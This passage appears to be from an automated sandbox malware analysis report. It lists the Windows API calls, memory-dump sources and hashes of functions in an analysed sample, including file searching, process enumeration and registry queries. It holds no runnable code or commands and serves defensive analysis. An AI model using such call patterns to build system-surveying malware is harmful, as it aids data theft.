                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B19764
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00B19771
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B1977B
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00B19788
                                                                                                                                                                                                                                                    • Part of subcall function 00B13975: lstrcpy.KERNEL32(00000000,?), ref: 00B13999
                                                                                                                                                                                                                                                    • Part of subcall function 00B139A7: lstrcpy.KERNEL32(00000000), ref: 00B139CA
                                                                                                                                                                                                                                                    • Part of subcall function 00B192FC: GetProcessHeap.KERNEL32 ref: 00B1930E
                                                                                                                                                                                                                                                    • Part of subcall function 00B192FC: FindFirstFileA.KERNEL32(?,?), ref: 00B1936A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$FileFindFirstFolderHeapPathProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1841389222-0
                                                                                                                                                                                                                                                  • Opcode ID: 012c3e621e2da63ea20026f09311a93b24641852794f56bc12d7c9dcc3b6d911
                                                                                                                                                                                                                                                  • Instruction ID: d0274c2e0b9edafd8a0390de8003be5948f4842c5819a9bb1b58b12d7bc70930
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 012c3e621e2da63ea20026f09311a93b24641852794f56bc12d7c9dcc3b6d911
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C441B472900659ABCB11EBA0DC46CEE73FDAF8A700B815599F60657012EB30B7C5CFA1
                                                                                                                                                                                                                                                  Function 0041FB48 Relevance: 7.6, APIs: 5, Instructions: 100timeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041FB8B
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041FBBC
                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041FBF0
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041FC00
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041FC32
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F77F
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F7C3
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7DF
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7F9
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F800
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F810
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F835
                                                                                                                                                                                                                                                    • Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F849
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Pointer$ReadTime$HandleInformationLocalSizeSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4216084854-0
                                                                                                                                                                                                                                                  • Opcode ID: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction ID: aeb9a57c7c30a851f1939dbb9e5bce1d4e0d01877bf27b1033796e67ae6ef790
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C31BDB1504744AFD714CB39C849AA7B7E8FF88704F404A3EF48AC6651E774E546CB20
                                                                                                                                                                                                                                                  Function 00B1FDAF Relevance: 7.6, APIs: 5, Instructions: 100timeCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00B1FDF2
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 00B1FE23
                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00B1FE57
                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B1FE67
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B1FE99
                                                                                                                                                                                                                                                    • Part of subcall function 00B1F9D5: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B1FE13), ref: 00B1F9E6
                                                                                                                                                                                                                                                    • Part of subcall function 00B1F9D5: GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B1FE13), ref: 00B1FA2A
                                                                                                                                                                                                                                                    • Part of subcall function 00B1F9D5: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1FA46
                                                                                                                                                                                                                                                    • Part of subcall function 00B1F9D5: SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1FA67
                                                                                                                                                                                                                                                    • Part of subcall function 00B1F9D5: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1FA9C
                                                                                                                                                                                                                                                    • Part of subcall function 00B1F9D5: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00B1FAB0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Pointer$Time$HandleInformationLocalReadSizeSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4169386603-0
                                                                                                                                                                                                                                                  • Opcode ID: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction ID: f95e97530e7e9f6b6b5b17ca82cf9c746db3705643596dc606f98d9edd41ec52
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5317CB2900745AFD714DB39C849AA7B7E8FF88704F504A3DF48AC6651E771E545CB20
                                                                                                                                                                                                                                                  Function 0041F988 Relevance: 7.6, APIs: 5, Instructions: 85fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9AA
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9BC
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9CD
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA11
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA2D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3457131274-0
                                                                                                                                                                                                                                                  • Opcode ID: 430fcabc74146748b10a5d1aa58081535d49e1319aacba17e3c89140f60aa00d
                                                                                                                                                                                                                                                  • Instruction ID: b713b32a0073a46aa718fb7c2f3049b9c34ab46680d856e50a716b5dcd1ad319
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 430fcabc74146748b10a5d1aa58081535d49e1319aacba17e3c89140f60aa00d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A621B6F1A00655BBD220DA25D984F97BB5CFF14394B54012BE80987A01D73CF8AAC7E9
                                                                                                                                                                                                                                                  Function 00B0B0D4 Relevance: 7.6, APIs: 5, Instructions: 75memoryfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00B0B11C
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 00B0B13F
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 00B0B160
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(EC8350EC), ref: 00B0B17F
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B0B186
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileLocal$AllocCloseFreeHandleReadSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2363778996-0
                                                                                                                                                                                                                                                  • Opcode ID: 385fe86b5d78b41b0f96b2b6be6f24aad4e2f19d7f5df57c5e3cd0131f8f0b94
                                                                                                                                                                                                                                                  • Instruction ID: 1d2a9a54b03f55649be2b877bbbaeb5444ce8324aa2dba5eab55b1a1a2a6c504
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 385fe86b5d78b41b0f96b2b6be6f24aad4e2f19d7f5df57c5e3cd0131f8f0b94
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F218C35600700AFC710EF69DC85E5ABBFAFF89710F009959E996C72A0DB70E945CB51
                                                                                                                                                                                                                                                  Function 00B14793 Relevance: 7.6, APIs: 5, Instructions: 65processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00B13975: lstrcpy.KERNEL32(00000000,?), ref: 00B13999
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0042EEFC,?,?,?,?,?,00644AE0,?,?,00644A23,?,?,?,?), ref: 00B147BE
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00B147C8
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00B147D8
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00B1483B
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B14846
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2673430994-0
                                                                                                                                                                                                                                                  • Opcode ID: d9b71223fb4a6d86eb45038ce0ff4f8db6f96fd0667739d18a1f46e8e92de1e8
                                                                                                                                                                                                                                                  • Instruction ID: 23515a30b880a17f26dadf5e818d160f2cddb435e69b45f4d7e558d0f99713c2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9b71223fb4a6d86eb45038ce0ff4f8db6f96fd0667739d18a1f46e8e92de1e8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1511C4743003946BE7106B209C8AFBF7EEDDF82B98F442469F54686582EF798944C761
                                                                                                                                                                                                                                                  Function 00B1485B Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateDCA.GDI32(00000000,00000000,00000000,?), ref: 00B1486A
                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00B14875
                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00B14880
                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00B1488A
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,00B1751A,?,?,?,00644AC5,?,?,00644A23,?,?,00000000,?,?,00644AB8,?), ref: 00B14896
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CapsDevice$CreateHeapProcessRelease
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2515617246-0
                                                                                                                                                                                                                                                  • Opcode ID: 74099194b8ff2a3052478e3cbb286403c3eeeff0735e7d7de334ae1239f9a096
                                                                                                                                                                                                                                                  • Instruction ID: f979afe7a5c949fa4b1b3a51ba47159ea154d8480085c24b1d4a413baacfb2ff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74099194b8ff2a3052478e3cbb286403c3eeeff0735e7d7de334ae1239f9a096
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF015E79201254BFE3209B61BC4AF573EAFEB63B91F012014FA0583261DEA51C1487A0
                                                                                                                                                                                                                                                  Function 00414A80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,0000000A,004150C3,00000000,?,00000000,0000000A,?,0000000A,00000000,?,0040B5D7,?), ref: 00414A86
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,000000FA,?,00000000,0000000A,?,0000000A,00000000,?,0040B5D7,?), ref: 00414A94
                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00414AA3
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                                                                  • String ID: %hs
                                                                                                                                                                                                                                                  • API String ID: 659108358-2783943728
                                                                                                                                                                                                                                                  • Opcode ID: eb602275fec487db5c4cdddd0d08a58ecb9e759a3597a397cdb84320ea1c1b3d
                                                                                                                                                                                                                                                  • Instruction ID: 5bd6a179048394e7de729c67cb4f3c16f8518d2a372a11019db7bb97310c50b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb602275fec487db5c4cdddd0d08a58ecb9e759a3597a397cdb84320ea1c1b3d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99D05E727402207FC2306769BC0DF17773CEBD5B22FD40535FA05D2160CAB0580587A8
                                                                                                                                                                                                                                                  Function 00B1FBEF Relevance: 6.1, APIs: 4, Instructions: 85fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000), ref: 00B1FC23
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00B205C9,?,00000001), ref: 00B1FC34
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 00B1FC78
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,00B205C9,?,00000001), ref: 00B1FC94
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3457131274-0
                                                                                                                                                                                                                                                  • Opcode ID: 9215c21dc182df5fafe0726e750e4efb347a45575b5d7e87538c8df8d44726ae
                                                                                                                                                                                                                                                  • Instruction ID: 6bc945095cf20b46b5342f77f20659cb0f1d6331bd2f3f20c4282340bef97e2c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9215c21dc182df5fafe0726e750e4efb347a45575b5d7e87538c8df8d44726ae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5221B4B1A0461AABD620DF25D984AA3B7ECFF54354B8405A5FC0987A01E731FCA5DBE0
                                                                                                                                                                                                                                                  Function 00B13E75 Relevance: 6.0, APIs: 4, Instructions: 46registrymemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00B13E87
                                                                                                                                                                                                                                                    • Part of subcall function 00B13F25: GetProcessHeap.KERNEL32(?,?,?,?,?,00B13E9E), ref: 00B13F3A
                                                                                                                                                                                                                                                    • Part of subcall function 00B13F25: RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119,?,?,?,?,?,?,00B13E9E), ref: 00B13F61
                                                                                                                                                                                                                                                    • Part of subcall function 00B13F25: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00B13E9E), ref: 00B13FE4
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,00020119), ref: 00B13EBA
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,000000FF), ref: 00B13ED8
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 00B13EE1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHeapOpenProcess$QueryValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 655526730-0
                                                                                                                                                                                                                                                  • Opcode ID: 87d23d9e2cff60529d3811262601cbe9998ce836c8214680716d8226d927426d
                                                                                                                                                                                                                                                  • Instruction ID: f21e078122b733c1bd59e216c9ba89ad6b09921d8d46ba6b1614121181684bdf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87d23d9e2cff60529d3811262601cbe9998ce836c8214680716d8226d927426d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1701F535904200EFD7109F60FC0FB663BE6FB43B05F442069F6459A0A0EBB14C949791
                                                                                                                                                                                                                                                  Function 00B016BF Relevance: 6.0, APIs: 4, Instructions: 42registrymemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00B016DC
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020119), ref: 00B016FA
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 00B01714
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 00B0171D
